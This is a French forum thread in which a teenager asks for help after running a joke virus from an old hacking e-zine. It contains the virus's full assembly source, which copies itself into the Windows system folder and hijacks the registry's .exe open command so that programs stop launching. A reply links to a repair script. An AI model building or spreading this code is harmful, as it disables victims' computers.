Bonjour, j'ai depuis quelques jour ... environ 3, un petit virus dit ; nul par l'auteur mais qui n'a pas été détecté par nortOn (merci ...)
j'ai trouvé ce virus dans un e-zine datant d'environ 2001.
J'ai le code source si vous voulez voir comment il est écrit pour m'aider a le corriger (svp)
 
Description : A chaque lancement d'un .exe le virus le bloque ... donc au redémarage plus de norton, plus de jeu plus rien quoi!
 
Voila le mail que j'ai envoyé a norton :
 
Bonjour, je suis désolé de vous contacter ici, mais je n'ai pas trouver d'autre solution.
J'ai 14 ans et un énorme problême. Je suis partie une semaine en vacance sans internet, pour m'occuper pendant cette semaine j'avais prévu un peut de lecture, j'ai donc téléchargé quelques e-zine de hacking sur madchat.org pour rire un peu.
Un ezine pas comme les autres, contenait un virus créer par le même auteur que l'ezine.
l'auteur disait que son virus était nul et qu'il était programmé faiblement.
J'ai voulu tester encore une fois norton antivirus comme j'ai l'habitude et j'ai ouvert la bombe ...
Le virus doit dater de 2001 environ, et il bloque l'execution des fichier .exe
 
Voici le code source : (.asm)
 
.486                  
.model flat, stdcall    
option casemap :none  
 include \masm32\include\windows.inc
 include \masm32\include\user32.inc
 include \masm32\include\kernel32.inc
 include \masm32\include\advapi32.inc
 
 includelib \masm32\lib\user32.lib
 includelib \masm32\lib\kernel32.lib
 includelib \masm32\lib\ADVAPI32.LIB
 
szText MACRO Name, Text:VARARG
 LOCAL lbl
 jmp lbl
 Name db Text,0
 lbl:
ENDM
 
.data
 buffer  db 200 dup(0)
 DwBytes         dd   12345678H
 pKey  dd 0
 Disp  dd 0
.data?
        hInstance  dd ?
        hIcon   dd  ?
 fil  dd 256 dup(?)
.code
start:
 invoke GetModuleHandle, NULL
 mov  hInstance, eax
 
 invoke  LoadIcon,hInstance,500  
 mov  hIcon, eax
 
 szText  titre, "- Seven SYnKoP Crew - Pouri v0.1b"
 szText  message, ".:=-( Fichier infecté (mytho!) par le Pouri virus wouwou berk chui méchant ! )-=:."
 szText nefil, "C:\WINDOWS\SYSTEM\VIRUSLOL.EXE"
 szText  neval, 34,"C:\WINDOWS\SYSTEM\VIRUSLOL.EXE",34," %1",0
 szText topr, 34,"%s",34," : ce fichier est infecté par ... rien en fait ... c'est pouri voilà tout !",0
 szText dakey, "exefile\shell\open\command\"
 szText szREGDWORD, 'REG_DWORD',0
 
 invoke  GetModuleFileName,NULL,addr fil,sizeof fil
 invoke  CopyFile,addr fil,addr nefil,FALSE
 
 invoke RegCreateKeyExA, HKEY_CLASSES_ROOT, addr dakey, 0, addr szREGDWORD , 0,KEY_WRITE or KEY_READ, 0, addr pKey, addr Disp
 invoke RegSetValueExA, pKey, NULL, NULL, REG_SZ, addr neval, sizeof neval
        invoke RegCloseKey, pKey        
 
 invoke  MessageBox,0, addr message, addr titre,0
 
 call GetCommandLineA
 mov     edi,eax
 add edi,21h
 
 invoke wsprintf, addr buffer, addr topr, edi
 
 invoke  MessageBox,0, addr buffer, addr titre,0
 
 invoke  ExitProcess,eax
end start
 
Merci de m'aider.
 
je vous demande la même chose, une technique ou un correctif :-)
merci a vous

salut essai ceci
· http://perso.wanadoo.fr/doc.jm/bin/VirusBdRRepair.vbs

Merci BEAUCOUP!!
tout remarche, thank you very much!

content pour toi
a++